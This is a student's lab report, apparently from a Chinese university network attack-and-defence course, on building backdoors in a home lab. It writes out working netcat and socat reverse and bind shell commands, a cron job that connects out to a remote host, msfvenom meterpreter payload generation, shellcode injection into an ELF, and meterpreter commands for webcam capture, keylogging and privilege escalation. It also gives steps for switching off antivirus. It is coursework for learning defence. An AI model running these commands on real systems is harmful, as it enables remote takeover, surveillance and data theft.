学号 2025-2026-1 《网络与系统攻防技术》实验二实验报告

news/2025/10/20 0:12:50/文章来源:https://www.cnblogs.com/20232319hj/p/19151322

一、实验内容

1.实践目标

(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)

PS:cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

2.实验要求

掌握后门原理及免杀技术
回答问题

(1)例举你能想到的一个后门进入到你系统中的可能方式?

答:下载未知安全性与来源的软件,可能会顺带下载后门程序

(2)例举你知道的后门如何启动起来(win及linux)的方式?

答:windows:将后门程序路径添加到注册表启动项,使系统启动时自动运行后门程序
linux:通过crontab设置定时任务,使后门在系统启动或特定时间自动执行

(3)Meterpreter有哪些给你映像深刻的功能?

答:能够获取被攻击者的照片,快速截屏,获取键盘输入信息。

(4)如何发现自己有系统有没有被安装后门?
答:使用杀毒软件与防火墙。

二、实验过程

1.使用netcat获取主机操作Shell,cron启动某项任务

主机和虚拟机互ping,测试连通性
检测_主机虚拟机互ping

使用netcat获取主机shell,kali获取主机操作shell
windows主机:ncat.exe-ecmd.exe 192.168.190.134 5218
kali虚拟机:ncat -l-p 5218
kali获得主机shell

windows获取主机操作shell
windows主机:ncat.exe -l -p 5218
kali虚拟机:nc 192.168.152.135 5218 -e /bin/sh
windows获取kali的shell

在kali虚拟机上使用cron
在文件末加上39 * * * * /bin/netcat 192.168.152.135 5218 -e /bin/sh
表示每个小时的39分反向连接windows的5218端口
crontab编辑

运行结果,(右下角)16时39分开始运行,获取shell
到点运行

2.使用socat获取主机操作Shell, 任务计划启动

打开任务计划程序
打开任务计划程序

使用socat,设定参数tcp-listen:5218 exec:cmd.exe,pty,stderr
使用socat

新建触发器
新建触发器

到点开始运行,获取主机shell
手动点击运行

成功运行获取主机shell

3.使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell

在kali上生成后门程序
msfvenom -p windows/meterpreter/reverse_tcp LH0ST=192.168.190.134 LP0RT=5218 -f exe > 20232319_backdbor.exe
控制端(kali)使用msf生成后门程序(20232319)

启动msfconsole,调用监听模块

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.190.134
set LPORT 5218

调用监听模块

通过netcat监听传输后门程序
通过netcat监听传输后门程序

成功启动后门程序,kali获取windows的shell
启动监听,同时在windows端运行后门程序,成功

4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

获取摄像头
成功后截屏

获取主机名,使用getsystem提权
成功后getuid

获取键盘输入内容
成功后读取键盘输入

总结常用渗透命令

record_mic #目标主机录制音频
screenshot #截屏
webcam_snap #调用摄像头拍照
keyscan_start #获取目标主机的键盘输入
keyscan_dump #导出目标主机键盘输入
keyscan_stop #停止

5.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

另起终端(终端2)
结合shellcode与msfconsole生成后门文件2319backdoor_shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcpLH0ST=192.168.190.136 LP0RT=5218 -X pwn20232319 -f elf > 2319backdoor_shellcode
-x ./pwn20232319将payload注入到名为pwn20232319的文件中;-f elf 指定生成文件的格式为 ELF
另起终端,结合shellcode生成后门程序

赋予后门程序的可执行权限
赋予可执行权限

在终端1启动msfconsole,在终端2运行后门程序

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp #注意此处为linux,不是windows
set LHOST 192.168.190.134
set LPORT 5218

反弹连接成功,获取shell
反弹连接成功

三、问题及解决方案

  • 问题1:exploit监听失败
  • 问题1解决方案:更新Metasploit
sudo apt update
sudo apt install metasploit-framework
  • 问题2:使用netcat传输过去的程序无法运行,显示当前版本无法运,或者显示当前程序存在病毒,禁止运行
    3262837-20251018103730225-33697121

  • 问题2解决方案:在windows中使用命令控制符(cmd)接收后门程序,而不是windows powershell;windows安全防护1中心 -> 病毒和防护威胁 -> 管理设置,关闭防护。

4.学习感悟、思考等

本次实验共有5个任务,每个任务各有其获取shell的特点。尤其是使用msfconsole生成后门程序的任务,体现了后门的隐蔽性与攻击性。身为本次实验的攻击者,我学会了如何使用kali监听主机,生成后门程序并操控被攻击者的shell。
本次实验中令人感到厌烦的的防火墙与病毒防护程序,在生活中的作用是多么的重要,没有防火墙的阻拦与杀毒软件检验到无意中下载的后门程序,个人的数据安全,隐私安全就有可能遭受到威胁。

参考资料

0x11_MAL_逆向与Bof基础.md
0x13_MAL_使用netcat进行反弹链接的shellcode.md

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/940689.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

为什么需要学习变异的算法?

对,“金标准得到的时间很长” 是一个非常现实且关键的点,尤其在临床或产品落地场景中,时间成本本身就是限制模型迭代和优化的瓶颈。✅ 补充第6点(在你这个设定下):障碍类别 具体原因 影响金标准延迟 金标准(如S…

今天搞了新的回归,不显著

今天搞了新的回归,可能被解释变量的度量存在问题,也可能是解释变量有毛病,总之回归结果跟预期的正好相反,甚至反的很显著,这也太恶心了。

shell编程学习笔记005之until循环

until循环语句各种用法探索语法: until 条件 do执行; done

shell编程学习笔记006之select循环

select循环语句各种用法探索语法: select 变量 in "列表" dolist done说明: select可以显示带编号的菜单,选择并执行不同的功能。 select是死循环,可以通过break语句终止循环,也可以使用Ctrl+D或Ctrl+C…

burpsuite抓取小程序公众号数据包-cnblog

burpsuite抓取小程序 公众号https数据包 burpsuite官网下载 https://portswigger.net/burp破解工具 通过网盘分享的文件:burp破解工具.zip 链接: https://pan.baidu.com/s/1An6ebL2LdM3VvFhJSRf4Zg?pwd=8888 提取码…

2026 NOI 做题记录(七)

推荐阅读:E、G、X、AA、AEContest Link \(\text{By DaiRuiChen007}\)A. [QOJ833] Cells Blocking (4) Problem Link 首先任意取出一条路径,上面至少有一个点被删除。 只保留同时能到达 \((1,1),(n,m)\) 的点,那么按…

关于本学期我的编码规范与数学之美第一章观后感 - C

一、规范 在阅读了大型公司公开的编码规范文章后,以下是我总结出的自己应当遵守的编码规范: 1.文件与命名规范 1)文件与命名规范 文件名、源文件后缀用 .cpp,头文件用 .h 命名用小写字母 + 下划线(蛇形命名) 2)…

GPT/Claude中转API部署实战指南_一文读懂AI聚合架构

GPT/Claude中转API部署实战指南_一文读懂AI聚合架构GPT/Claude 中转站技术架构详解 随着 AI 模型(如 OpenAI 的 GPT 系列和 Anthropic 的 Claude)在全球范围内的广泛应用,跨区域访问、稳定性保障和高并发请求处理成…

esp8266模块开发准备工作

文档:NodeMCU Documentation 涉及软件:构建固件 通过在线构建网站构建固件(方式一) NodeMCU custom builds勾选要使用的库,然后设置好邮件地址(部分地址可能不支持),然后点击开始构建即可,完成后构建结果会发…

线程--线程生命周期、Synchronized

四、线程的生命周期 JDK 中用 Thread.State 枚举代表了线程的几种状态NEW:尚未启动对啊线程处于此状态 RUNNABLE:在Java虚拟机中执行的线程处于此状态(可运行状态,但不一定马上running,什么时候运行需要看操作系统…

C#中Yolo开发环境

在C#中进行Yolo部署,需要安装以下第三方库。OpenCVSharp选择目前最稳定的4.6版本。

CF1918F Caterpillar on a Tree

题目大意: 有一棵 \(n\) 个节点的树,你初始在 \(1\) 节点,每次你可以选择以下某一步。移到与 \(x\) 相邻的点,花费 \(1\) 的时间。 移到 \(1\),不花费时间。 第二种操作最多执行 \(k\) 次,求最小遍历完整棵树的时…

tryhackme-预安全-网络如何工作-DNS 详细信息-09

tryhackme-Pre Security-How The Web Works-DNS in Detail 房间地址:https://tryhackme.com/room/dnsindetail 这是网络安全入门的基础模块的计算机科学基础知识:DNS in Detail(DNS 详细信息),序号 01 表示第一篇…

Diccionario del estudiante

https://letras.rae.es/libros-electronicos/180-diccionario-del-estudiante-aplicacion-movil.html Diccionario del estudianteEl Diccionario del estudiante <https://www.rae.es/diccionario-estudiante/>…

[Linux] 开启本地网络转发功能(IPv4)

[Linux] 开启本地网络转发功能(IPv4)$(".postTitle2").removeClass("postTitle2").addClass("singleposttitle");目录01 原理02 网关模式2.1 简介2.2 开启Linux转发功能2.3 使用iptab…

l2正则化项以及torch.norm

非常好,这段代码是一个非常典型的 L2 正则化(L2 Regularization) 的实现例子。 我们来一步步讲清楚它的作用、为什么写成这样,以及 torch.norm(param, p=2) 的意义。一、先看这段代码在干什么 # 手动计算 L2 正则化…

SP4191 天空代码 分析

题目概述 问有多少个 \((a,b,c,d)\),在 \(n\) 个数的 \(x\) 满足 \(\gcd\{x_a,x_b,x_c,x_d\}=1\). 其中,\(n,\max x\leq 10^4\)。 分析 套路经典题目,记录一下。 设 \(f(d)\) 表示选 \(4\) 个数,其最大公约数为 \(…

应用安全 --- 安卓加固 之 vdex转dex

应用安全 --- 安卓加固 之 vdex转dexodex是安卓8之后新的dex优化方案,可以将java字节码转换为底层汇编指令提升执行效率。转化方法 安装转化app(https://qyma.lanzoui.com/b04yht1md),使用mt管理器将你要转换到的v…

大物实验

另:大物实验是真的费时间